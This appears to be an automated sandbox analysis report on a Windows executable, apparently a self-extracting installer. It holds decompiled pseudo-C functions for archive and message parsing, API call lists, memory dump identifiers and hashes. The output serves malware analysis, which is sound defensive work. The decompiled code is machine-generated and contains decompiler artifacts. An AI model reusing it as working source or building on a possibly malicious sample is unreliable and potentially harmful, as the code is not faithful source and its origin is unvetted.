                                                                            										goto L162;
                                                                            									}
                                                                            								}
                                                                            							case 0xb:
                                                                            								__eflags = __ebx - 7;
                                                                            								if(__ebx == 7) {
                                                                            									 *0x1d9600 = 1;
                                                                            								}
                                                                            								goto L167;
                                                                            							case 0xc:
                                                                            								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            								__eax = E001B59C0( *(__ebp - 0x5c84) & 0x0000ffff);
                                                                            								__eflags = __eax - 0x46;
                                                                            								if(__eax == 0x46) {
                                                                            									 *0x1d75d4 = 1;
                                                                            								} else {
                                                                            									__eflags = __eax - 0x55;
                                                                            									if(__eax == 0x55) {
                                                                            										 *0x1d75d5 = 1;
                                                                            									} else {
                                                                            										__eax = 0;
                                                                            										 *0x1d75d4 = __al;
                                                                            										 *0x1d75d5 = __al;
                                                                            									}
                                                                            								}
                                                                            								goto L167;
                                                                            							case 0xd:
                                                                            								 *0x1ede21 = 1;
                                                                            								__eax = __eax + 0x1ede21;
                                                                            								_t112 = __esi + 0x39;
                                                                            								 *_t112 =  *(__esi + 0x39) + __esp;
                                                                            								__eflags =  *_t112;
                                                                            								__ebp = 0xffffa37c;
                                                                            								if( *_t112 != 0) {
                                                                            									_t114 = __ebp - 0x5c84; // 0xffff46f8
                                                                            									__eax = _t114;
                                                                            									_push(_t114);
                                                                            									 *0x1cd5fc = E001A13FC();
                                                                            								}
                                                                            								goto L167;
                                                                            						}
                                                                            						L4:
                                                                            						_t220 = E001A9E24(_t220, _t296);
                                                                            						_t296 = _t296 + 0x2000;
                                                                            						_t293 = _t293 - 1;
                                                                            						if(_t293 != 0) {
                                                                            							goto L4;
                                                                            						} else {
                                                                            							_t297 = _t293;
                                                                            							goto L6;
                                                                            						}
                                                                            						L167:
                                                                            						_push(0x1000);
                                                                            						_t205 = _t302 - 0xe; // 0xffffa36e
                                                                            						_t206 = _t302 - 0xd; // 0xffffa36f
                                                                            						_t207 = _t302 - 0x5c84; // 0xffff46f8
                                                                            						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
                                                                            						_push( *((intOrPtr*)(_t302 + 0xc)));
                                                                            						_t215 = E001AA156();
                                                                            						_t278 =  *((intOrPtr*)(_t302 + 0x10));
                                                                            						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
                                                                            					} while (_t215 != 0);
                                                                            				}
                                                                            			}











                                                                            0x001ab83c
                                                                            0x001ab843
                                                                            0x001ab844
                                                                            0x001ab84b
                                                                            0x001ab84d
                                                                            0x001ab84d
                                                                            0x001ab854
                                                                            0x001ab859
                                                                            0x001ab85f
                                                                            0x001ab861
                                                                            0x00000000
                                                                            0x001ab867
                                                                            0x001ab867
                                                                            0x001ab86a
                                                                            0x001ab86c
                                                                            0x001ab86d
                                                                            0x001ab870
                                                                            0x001ab899
                                                                            0x001ab899
                                                                            0x001ab89c
                                                                            0x001ab981
                                                                            0x001ab98a
                                                                            0x001ab98f
                                                                            0x001ab98f
                                                                            0x001ab991
                                                                            0x001ab991
                                                                            0x001ab993
                                                                            0x001ab995
                                                                            0x001ab99c
                                                                            0x001ab9a1
                                                                            0x001ab9a2
                                                                            0x001ab9a3
                                                                            0x001ab9a5
                                                                            0x001ab9a7
                                                                            0x001ab9ab
                                                                            0x001ab9ad
                                                                            0x001ab9ad
                                                                            0x001ab9af
                                                                            0x001ab9af
                                                                            0x001ab9ab
                                                                            0x001ab9b3
                                                                            0x001ab9b9
                                                                            0x001ab9c6
                                                                            0x001ab9cd
                                                                            0x001ab9dd
                                                                            0x001ab9e7
                                                                            0x001ab9ef
                                                                            0x001ab9fb
                                                                            0x001ab9fd
                                                                            0x001aba05
                                                                            0x001aba0a
                                                                            0x001aba0b
                                                                            0x001aba0c
                                                                            0x001aba0e
                                                                            0x001aba1b
                                                                            0x001aba24
                                                                            0x001aba24
                                                                            0x00000000
                                                                            0x001aba0e
                                                                            0x001ab8a2
                                                                            0x001ab8a5
                                                                            0x001ab8b2
                                                                            0x001ab8b2
                                                                            0x001ab8b5
                                                                            0x001ab8b7
                                                                            0x001ab8b8
                                                                            0x001ab8ba
                                                                            0x001ab8bb
                                                                            0x001ab8c0
                                                                            0x001ab8c5
                                                                            0x001ab8cb
                                                                            0x001ab8cd
                                                                            0x001ab8cf
                                                                            0x001ab8d2
                                                                            0x001ab8d9
                                                                            0x001ab8da
                                                                            0x001ab8e0
                                                                            0x001ab8e1
                                                                            0x001ab8e4
                                                                            0x001ab8e5
                                                                            0x001ab8e6
                                                                            0x001ab8eb
                                                                            0x001ab8ee
                                                                            0x001ab8f4
                                                                            0x001ab8fd
                                                                            0x001ab900
                                                                            0x001ab905
                                                                            0x001ab907
                                                                            0x001ab909
                                                                            0x001ab90b
                                                                            0x001ab90b
                                                                            0x001ab90d
                                                                            0x001ab90d
                                                                            0x001ab90f
                                                                            0x001ab90f
                                                                            0x001ab917
                                                                            0x001ab91e
                                                                            0x001ab920
                                                                            0x001ab927
                                                                            0x001ab92d
                                                                            0x001ab92f
                                                                            0x001ab930
                                                                            0x001ab938
                                                                            0x001ab947
                                                                            0x001ab947
                                                                            0x001ab938
                                                                            0x001ab952
                                                                            0x001ab954
                                                                            0x001ab963
                                                                            0x001ab969
                                                                            0x001ab96f
                                                                            0x001ab97a
                                                                            0x001ab97a
                                                                            0x00000000
                                                                            0x001ab96f
                                                                            0x001ab8a7
                                                                            0x001ab8ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab8ac
                                                                            0x001ab872
                                                                            0x001ab876
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001ab878
                                                                            0x001ab87b
                                                                            0x001ab87d
                                                                            0x001ab880
                                                                            0x00000000
                                                                            0x001ab886
                                                                            0x001ab88f
                                                                            0x00000000
                                                                            0x001ab88f
                                                                            0x001ab880
                                                                            0x00000000
                                                                            0x001aba2b
                                                                            0x001aba2c
                                                                            0x001aba31
                                                                            0x001aba33
                                                                            0x001aba36
                                                                            0x001aba36
                                                                            0x00000000
                                                                            0x001aba6c
                                                                            0x001aba73
                                                                            0x001aba75
                                                                            0x001aba75
                                                                            0x001aba77
                                                                            0x001abaa6
                                                                            0x001abaa6
                                                                            0x001abaac
                                                                            0x00000000
                                                                            0x001abaac
                                                                            0x001aba79
                                                                            0x001aba79
                                                                            0x001aba7c
                                                                            0x001aba95
                                                                            0x001aba9b
                                                                            0x001aba9b
                                                                            0x00000000
                                                                            0x001aba9b
                                                                            0x001aba7e
                                                                            0x001aba7e
                                                                            0x001aba81
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aba83
                                                                            0x001aba83
                                                                            0x001aba86
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001aba8c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abaf9
                                                                            0x001abafc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abafe
                                                                            0x001abb0a
                                                                            0x001abb0f
                                                                            0x001abb10
                                                                            0x001abb11
                                                                            0x001abb13
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abb15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abb5b
                                                                            0x001abb5e
                                                                            0x001abcdf
                                                                            0x001abcdf
                                                                            0x001abce2
                                                                            0x001abce8
                                                                            0x001abcef
                                                                            0x001abcf1
                                                                            0x001abcf1
                                                                            0x001abcfb
                                                                            0x001abcfb
                                                                            0x00000000
                                                                            0x001abce2
                                                                            0x001abb64
                                                                            0x001abb6a
                                                                            0x001abb78
                                                                            0x001abb84
                                                                            0x001abb86
                                                                            0x001abb88
                                                                            0x001abb8d
                                                                            0x001abb8d
                                                                            0x001abba5
                                                                            0x001abbb2
                                                                            0x001abbb7
                                                                            0x001abbb9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abb8b
                                                                            0x001abb8b
                                                                            0x001abb8c
                                                                            0x001abb8c
                                                                            0x001abbc5
                                                                            0x001abbcb
                                                                            0x001abbd3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abbd9
                                                                            0x001abbe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abbe6
                                                                            0x001abbe8
                                                                            0x001abbef
                                                                            0x001abbf5
                                                                            0x001abbf7
                                                                            0x001abbf8
                                                                            0x001abbfd
                                                                            0x001abbfe
                                                                            0x001abbff
                                                                            0x001abc01
                                                                            0x001abc55
                                                                            0x001abc55
                                                                            0x001abc5d
                                                                            0x001abc6b
                                                                            0x001abc7c
                                                                            0x001abc8a
                                                                            0x001abc8a
                                                                            0x001abc96
                                                                            0x001abc9b
                                                                            0x001abc9d
                                                                            0x001abcad
                                                                            0x001abcb7
                                                                            0x001abcbc
                                                                            0x001abcbf
                                                                            0x00000000
                                                                            0x001abcc5
                                                                            0x001abcca
                                                                            0x001abcca
                                                                            0x001abccc
                                                                            0x001abcd3
                                                                            0x001abcd9
                                                                            0x00000000
                                                                            0x001abcd9
                                                                            0x001abcbf
                                                                            0x001abc03
                                                                            0x001abc05
                                                                            0x001abc07
                                                                            0x001abc0e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abc10
                                                                            0x001abc12
                                                                            0x001abc18
                                                                            0x001abc18
                                                                            0x001abc1c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abc1e
                                                                            0x001abc1f
                                                                            0x001abc25
                                                                            0x001abc28
                                                                            0x001abc2a
                                                                            0x001abc2d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abc2f
                                                                            0x001abc3c
                                                                            0x001abc46
                                                                            0x001abc4b
                                                                            0x001abc4b
                                                                            0x001abc4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd07
                                                                            0x001abd0a
                                                                            0x001abd0c
                                                                            0x001abd13
                                                                            0x001abd15
                                                                            0x001abd1b
                                                                            0x001abd1c
                                                                            0x001abd21
                                                                            0x001abd22
                                                                            0x001abd22
                                                                            0x001abd27
                                                                            0x001abd2a
                                                                            0x001abd30
                                                                            0x001abd30
                                                                            0x001abd35
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001abd41
                                                                            0x001abd44
                                                                            0x001abb25
                                                                            0x001abb25
                                                                            0x00000000
                                                                            0x001abb25
                                                                            0x001abd4a
                                                                            0x001abb16
                                                                            0x001abb16
                                                                            0x001abb1c
                                                                            0x001abb1d
                                                                            0x001abb20
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001AB4CC
                                                                              • Part of subcall function 001AA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001AA21E
                                                                            • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,001AADDF,?,00000000), ref: 001AB601
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 001AB6BB
                                                                            • DeleteFileW.KERNEL32(?), ref: 001AB6C9
                                                                            • SetWindowTextW.USER32(?,?), ref: 001AB812
                                                                            • _wcsrchr.LIBVCRUNTIME ref: 001AB99C
                                                                            • GetDlgItem.USER32(?,00000066), ref: 001AB9D7
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 001AB9E7
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,001D9602), ref: 001AB9FB
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001ABA24
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                            • API String ID: 3676479488-312220925
                                                                            • Opcode ID: 92d22d8d9431afed2933964e60e5501d61bf3c900f4f575f1ba619b381e4fded
                                                                            • Instruction ID: 0f2b94d7ed00096d59848b6f194aad8773cc6b362f3c051579f15be9b842e6c6
                                                                            • Opcode Fuzzy Hash: 92d22d8d9431afed2933964e60e5501d61bf3c900f4f575f1ba619b381e4fded
                                                                            • Instruction Fuzzy Hash: 13E1827A904259AAEF24EBA4DD85EEF777CAF15350F0040A6F509E7141EF709B848FA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E0019CFD0(signed int __ecx, void* __edx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed int _t196;
                                                                            				void* _t197;
                                                                            				WCHAR* _t198;
                                                                            				void* _t203;
                                                                            				signed int _t212;
                                                                            				signed int _t215;
                                                                            				signed int _t218;
                                                                            				signed int _t228;
                                                                            				void* _t229;
                                                                            				void* _t232;
                                                                            				signed int _t235;
                                                                            				signed int _t237;
                                                                            				signed int _t238;
                                                                            				signed int _t239;
                                                                            				signed int _t244;
                                                                            				signed int _t248;
                                                                            				signed int _t262;
                                                                            				signed int _t267;
                                                                            				signed int _t268;
                                                                            				signed int _t270;
                                                                            				signed int _t272;
                                                                            				signed int _t273;
                                                                            				void* _t274;
                                                                            				signed int _t279;
                                                                            				char* _t280;
                                                                            				signed int _t284;
                                                                            				short _t287;
                                                                            				void* _t288;
                                                                            				signed int _t294;
                                                                            				signed int _t299;
                                                                            				void* _t302;
                                                                            				void* _t304;
                                                                            				void* _t307;
                                                                            				signed int _t316;
                                                                            				signed int _t318;
                                                                            				unsigned int _t328;
                                                                            				signed int _t330;
                                                                            				unsigned int _t333;
                                                                            				signed int _t336;
                                                                            				void* _t343;
                                                                            				signed int _t348;
                                                                            				signed int _t351;
                                                                            				signed int _t352;
                                                                            				signed int _t357;
                                                                            				signed int _t361;
                                                                            				void* _t370;
                                                                            				signed int _t372;
                                                                            				signed int _t373;
                                                                            				void* _t374;
                                                                            				void* _t375;
                                                                            				intOrPtr* _t376;
                                                                            				signed int _t377;
                                                                            				signed int _t380;
                                                                            				signed int _t381;
                                                                            				signed int _t382;
                                                                            				signed int _t383;
                                                                            				signed int _t384;
                                                                            				signed int _t387;
                                                                            				signed int _t389;
                                                                            				signed int* _t390;
                                                                            				void* _t391;
                                                                            				void* _t392;
                                                                            				void* _t394;
                                                                            				void* _t398;
                                                                            				void* _t399;
                                                                            
                                                                            				_t370 = __edx;
                                                                            				_t318 = __ecx;
                                                                            				_t392 = _t391 - 0x6c;
                                                                            				E001AD870(E001C13DF, _t390);
                                                                            				E001AD940();
                                                                            				_t196 = 0x5c;
                                                                            				_push(0x427c);
                                                                            				_push(_t390[0x1e]);
                                                                            				_t387 = _t318;
                                                                            				_t390[0x11] = _t196;
                                                                            				_t390[0x12] = _t387;
                                                                            				_t197 = E001B0BB8(_t318);
                                                                            				_t316 = 0;
                                                                            				_t396 = _t197;
                                                                            				_t198 = _t390 - 0x1264;
                                                                            				if(_t197 != 0) {
                                                                            					E0019FAB1(_t198, _t390[0x1e], 0x800);
                                                                            				} else {
                                                                            					GetModuleFileNameW(0, _t198, 0x800);
                                                                            					 *((short*)(E0019B943(_t396, _t390 - 0x1264))) = 0;
                                                                            					E0019FA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
                                                                            				}
                                                                            				E0019943C(_t390 - 0x2288);
                                                                            				_push(4);
                                                                            				 *(_t390 - 4) = _t316;
                                                                            				_push(_t390 - 0x1264);
                                                                            				if(E00199768(_t390 - 0x2288, _t387) == 0) {
                                                                            					L57:
                                                                            					_t203 = E0019946E(_t390 - 0x2288); // executed
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
                                                                            					return _t203;
                                                                            				} else {
                                                                            					_t380 = _t316;
                                                                            					_t398 =  *0x1cd5f4 - _t380; // 0x63
                                                                            					if(_t398 <= 0) {
                                                                            						L7:
                                                                            						E001B5030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0019CC62);
                                                                            						E001B5030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E0019CBC7);
                                                                            						_t394 = _t392 + 0x20;
                                                                            						_t390[0x1e] = _t316;
                                                                            						_t381 = _t380 | 0xffffffff;
                                                                            						_t390[0x16] = _t316;
                                                                            						_t390[0x19] = _t381;
                                                                            						while(_t381 == 0xffffffff) {
                                                                            							_t390[0x1b] = E00199B57();
                                                                            							_t294 = E00199979(_t370, _t390 - 0x4288, 0x2000);
                                                                            							_t390[0x17] = _t294;
                                                                            							_t384 = _t316;
                                                                            							_t25 = _t294 - 0x10; // -16
                                                                            							_t361 = _t25;
                                                                            							_t390[0x15] = _t361;
                                                                            							if(_t361 < 0) {
                                                                            								L25:
                                                                            								_t295 = _t390[0x1b];
                                                                            								_t381 = _t390[0x19];
                                                                            								L26:
                                                                            								E00199A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
                                                                            								_t299 = _t390[0x16] + 1;
                                                                            								_t390[0x16] = _t299;
                                                                            								__eflags = _t299 - 0x100;
                                                                            								if(_t299 < 0x100) {
                                                                            									continue;
                                                                            								}
                                                                            								__eflags = _t381 - 0xffffffff;
                                                                            								if(_t381 == 0xffffffff) {
                                                                            									goto L57;
                                                                            								}
                                                                            								break;
                                                                            							}
                                                                            							L10:
                                                                            							while(1) {
                                                                            								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
                                                                            									L14:
                                                                            									_t370 = 0x2a;
                                                                            									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
                                                                            										L18:
                                                                            										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
                                                                            											L21:
                                                                            											_t384 = _t384 + 1;
                                                                            											if(_t384 > _t390[0x15]) {
                                                                            												goto L25;
                                                                            											}
                                                                            											_t294 = _t390[0x17];
                                                                            											continue;
                                                                            										} else {
                                                                            											_t302 = E001B5460(_t390 - 0x4286 + _t384, 0x1c261c, 4);
                                                                            											_t394 = _t394 + 0xc;
                                                                            											if(_t302 == 0) {
                                                                            												goto L57;
                                                                            											}
                                                                            											goto L21;
                                                                            										}
                                                                            									}
                                                                            									_t366 = _t390 - 0x4284 + _t384;
                                                                            									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
                                                                            										_t304 = E001B4DA0(_t366, L"*messages***", 0xb);
                                                                            										_t394 = _t394 + 0xc;
                                                                            										if(_t304 == 0) {
                                                                            											_t390[0x1e] = 1;
                                                                            											goto L24;
                                                                            										}
                                                                            									}
                                                                            									goto L18;
                                                                            								} else {
                                                                            									_t307 = E001B5460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
                                                                            									_t394 = _t394 + 0xc;
                                                                            									if(_t307 == 0) {
                                                                            										L24:
                                                                            										_t295 = _t390[0x1b];
                                                                            										_t381 = _t384 + _t390[0x1b];
                                                                            										_t390[0x19] = _t381;
                                                                            										goto L26;
                                                                            									}
                                                                            									_t294 = _t390[0x17];
                                                                            									goto L14;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						asm("cdq");
                                                                            						E00199A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
                                                                            						_push(0x200002);
                                                                            						_t382 = E001B2B53(_t390 - 0x2288);
                                                                            						_t390[0x1a] = _t382;
                                                                            						__eflags = _t382;
                                                                            						if(_t382 == 0) {
                                                                            							goto L57;
                                                                            						}
                                                                            						_t328 = E00199979(_t370, _t382, 0x200000);
                                                                            						_t390[0x19] = _t328;
                                                                            						__eflags = _t390[0x1e];
                                                                            						if(_t390[0x1e] == 0) {
                                                                            							_push(2 + _t328 * 2);
                                                                            							_t212 = E001B2B53(_t328);
                                                                            							_t390[0x1e] = _t212;
                                                                            							__eflags = _t212;
                                                                            							if(_t212 == 0) {
                                                                            								goto L57;
                                                                            							}
                                                                            							_t330 = _t390[0x19];
                                                                            							 *(_t330 + _t382) = _t316;
                                                                            							__eflags = _t330 + 1;
                                                                            							E001A0FDE(_t382, _t212, _t330 + 1);
                                                                            							L001B2B4E(_t382);
                                                                            							_t382 = _t390[0x1e];
                                                                            							_t333 = _t390[0x19];
                                                                            							_t390[0x1a] = _t382;
                                                                            							L33:
                                                                            							_t215 = 0x100000;
                                                                            							__eflags = _t333 - 0x100000;
                                                                            							if(_t333 <= 0x100000) {
                                                                            								_t215 = _t333;
                                                                            							}
                                                                            							 *((short*)(_t382 + _t215 * 2)) = 0;
                                                                            							E0019FA56(_t390 - 0xd4, 0x1c2624, 0x64);
                                                                            							_push(0x20002);
                                                                            							_t218 = E001B2B53(0);
                                                                            							_t390[0x1b] = _t218;
                                                                            							__eflags = _t218;
                                                                            							if(_t218 != 0) {
                                                                            								__eflags = _t390[0x19];
                                                                            								_t336 = _t316;
                                                                            								_t371 = _t316;
                                                                            								_t390[0x1e] = _t336;
                                                                            								 *_t390 = _t316;
                                                                            								_t383 = _t316;
                                                                            								_t390[0x17] = _t316;
                                                                            								if(_t390[0x19] <= 0) {
                                                                            									L54:
                                                                            									E0019CB33(_t387, _t371, _t390, _t218, _t336);
                                                                            									L001B2B4E(_t390[0x1a]);
                                                                            									L001B2B4E(_t390[0x1b]);
                                                                            									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
                                                                            									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
                                                                            										L56:
                                                                            										 *0x1d0124 =  *((intOrPtr*)(_t387 + 0x28));
                                                                            										E001B5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E0019CD08);
                                                                            										E001B5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E0019CD37);
                                                                            										goto L57;
                                                                            									} else {
                                                                            										goto L55;
                                                                            									}
                                                                            									do {
                                                                            										L55:
                                                                            										E001A3393(_t387 + 0x3c, _t371, _t316);
                                                                            										E001A3393(_t387 + 0x50, _t371, _t316);
                                                                            										_t316 = _t316 + 1;
                                                                            										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
                                                                            									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
                                                                            									goto L56;
                                                                            								}
                                                                            								_t390[0x14] = 0xd;
                                                                            								_t390[0x13] = 0xa;
                                                                            								_t390[0x15] = 9;
                                                                            								do {
                                                                            									_t228 = _t390[0x1a];
                                                                            									__eflags = _t383;
                                                                            									if(_t383 == 0) {
                                                                            										L80:
                                                                            										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                                                                            										_t383 = _t383 + 1;
                                                                            										__eflags = _t372;
                                                                            										if(_t372 == 0) {
                                                                            											break;
                                                                            										}
                                                                            										__eflags = _t372 - _t390[0x11];
                                                                            										if(_t372 != _t390[0x11]) {
                                                                            											_t229 = 0xd;
                                                                            											__eflags = _t372 - _t229;
                                                                            											if(_t372 == _t229) {
                                                                            												L99:
                                                                            												E0019CB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
                                                                            												 *_t390 = _t316;
                                                                            												_t336 = _t316;
                                                                            												_t390[0x17] = _t316;
                                                                            												L98:
                                                                            												_t390[0x1e] = _t336;
                                                                            												goto L52;
                                                                            											}
                                                                            											_t232 = 0xa;
                                                                            											__eflags = _t372 - _t232;
                                                                            											if(_t372 == _t232) {
                                                                            												goto L99;
                                                                            											}
                                                                            											L96:
                                                                            											__eflags = _t336 - 0x10000;
                                                                            											if(_t336 >= 0x10000) {
                                                                            												goto L52;
                                                                            											}
                                                                            											 *(_t390[0x1b] + _t336 * 2) = _t372;
                                                                            											_t336 = _t336 + 1;
                                                                            											__eflags = _t336;
                                                                            											goto L98;
                                                                            										}
                                                                            										__eflags = _t336 - 0x10000;
                                                                            										if(_t336 >= 0x10000) {
                                                                            											goto L52;
                                                                            										}
                                                                            										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
                                                                            										__eflags = _t235;
                                                                            										if(_t235 == 0) {
                                                                            											_push(0x22);
                                                                            											L93:
                                                                            											_pop(_t377);
                                                                            											 *(_t390[0x1b] + _t336 * 2) = _t377;
                                                                            											_t336 = _t336 + 1;
                                                                            											_t390[0x1e] = _t336;
                                                                            											_t383 = _t383 + 1;
                                                                            											goto L52;
                                                                            										}
                                                                            										_t237 = _t235 - 0x3a;
                                                                            										__eflags = _t237;
                                                                            										if(_t237 == 0) {
                                                                            											_push(0x5c);
                                                                            											goto L93;
                                                                            										}
                                                                            										_t238 = _t237 - 0x12;
                                                                            										__eflags = _t238;
                                                                            										if(_t238 == 0) {
                                                                            											_push(0xa);
                                                                            											goto L93;
                                                                            										}
                                                                            										_t239 = _t238 - 4;
                                                                            										__eflags = _t239;
                                                                            										if(_t239 == 0) {
                                                                            											_push(0xd);
                                                                            											goto L93;
                                                                            										}
                                                                            										__eflags = _t239 != 0;
                                                                            										if(_t239 != 0) {
                                                                            											goto L96;
                                                                            										}
                                                                            										_push(9);
                                                                            										goto L93;
                                                                            									}
                                                                            									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
                                                                            									__eflags = _t373 - _t390[0x14];
                                                                            									if(_t373 == _t390[0x14]) {
                                                                            										L42:
                                                                            										_t343 = 0x3a;
                                                                            										__eflags =  *(_t228 + _t383 * 2) - _t343;
                                                                            										if( *(_t228 + _t383 * 2) != _t343) {
                                                                            											L71:
                                                                            											_t390[0x18] = _t228 + _t383 * 2;
                                                                            											_t244 = E0019F91A( *(_t228 + _t383 * 2) & 0x0000ffff);
                                                                            											__eflags = _t244;
                                                                            											if(_t244 == 0) {
                                                                            												L79:
                                                                            												_t336 = _t390[0x1e];
                                                                            												_t228 = _t390[0x1a];
                                                                            												goto L80;
                                                                            											}
                                                                            											E0019FAB1(_t390 - 0x264, _t390[0x18], 0x64);
                                                                            											_t248 = E001B4E1D(_t390 - 0x264, L" \t,");
                                                                            											_t390[0x18] = _t248;
                                                                            											__eflags = _t248;
                                                                            											if(_t248 == 0) {
                                                                            												goto L79;
                                                                            											}
                                                                            											 *_t248 = 0;
                                                                            											E001A11FA(_t390 - 0x264, _t390 - 0x138, 0x64);
                                                                            											E0019FA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
                                                                            											E0019FA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
                                                                            											E0019FA56(_t390, _t390 - 0x70, 0x32);
                                                                            											_t262 = E001B4E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0019CCED);
                                                                            											_t394 = _t394 + 0x14;
                                                                            											__eflags = _t262;
                                                                            											if(_t262 != 0) {
                                                                            												_t268 =  *_t262 * 0xc;
                                                                            												__eflags = _t268;
                                                                            												_t167 = _t268 + 0x1cd150; // 0x28b64ee0
                                                                            												_t390[0x17] =  *_t167;
                                                                            											}
                                                                            											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
                                                                            											__eflags = _t383;
                                                                            											_t267 = _t390[0x1a];
                                                                            											_t374 = 0x20;
                                                                            											while(1) {
                                                                            												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
                                                                            												__eflags = _t348 - _t374;
                                                                            												if(_t348 == _t374) {
                                                                            													goto L78;
                                                                            												}
                                                                            												L77:
                                                                            												_t174 =  &(_t390[0x15]); // 0x9
                                                                            												__eflags = _t348 -  *_t174;
                                                                            												if(_t348 !=  *_t174) {
                                                                            													L51:
                                                                            													_t336 = _t390[0x1e];
                                                                            													goto L52;
                                                                            												}
                                                                            												L78:
                                                                            												_t383 = _t383 + 1;
                                                                            												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
                                                                            												__eflags = _t348 - _t374;
                                                                            												if(_t348 == _t374) {
                                                                            													goto L78;
                                                                            												}
                                                                            												goto L77;
                                                                            											}
                                                                            										}
                                                                            										_t389 = _t390[0x1a];
                                                                            										_t270 = _t228 | 0xffffffff;
                                                                            										__eflags = _t270;
                                                                            										_t390[0x16] = _t270;
                                                                            										_t390[0xd] = L"STRINGS";
                                                                            										_t390[0xe] = L"DIALOG";
                                                                            										_t390[0xf] = L"MENU";
                                                                            										_t390[0x10] = L"DIRECTION";
                                                                            										_t390[0x18] = _t316;
                                                                            										do {
                                                                            											_t390[0x18] = E001B2B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
                                                                            											_t272 = E001B4DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
                                                                            											_t394 = _t394 + 0x10;
                                                                            											_t375 = 0x20;
                                                                            											__eflags = _t272;
                                                                            											if(_t272 != 0) {
                                                                            												L47:
                                                                            												_t273 = _t390[0x16];
                                                                            												goto L48;
                                                                            											}
                                                                            											_t357 = _t390[0x18] + _t383;
                                                                            											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
                                                                            											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
                                                                            												goto L47;
                                                                            											}
                                                                            											_t273 = _t316;
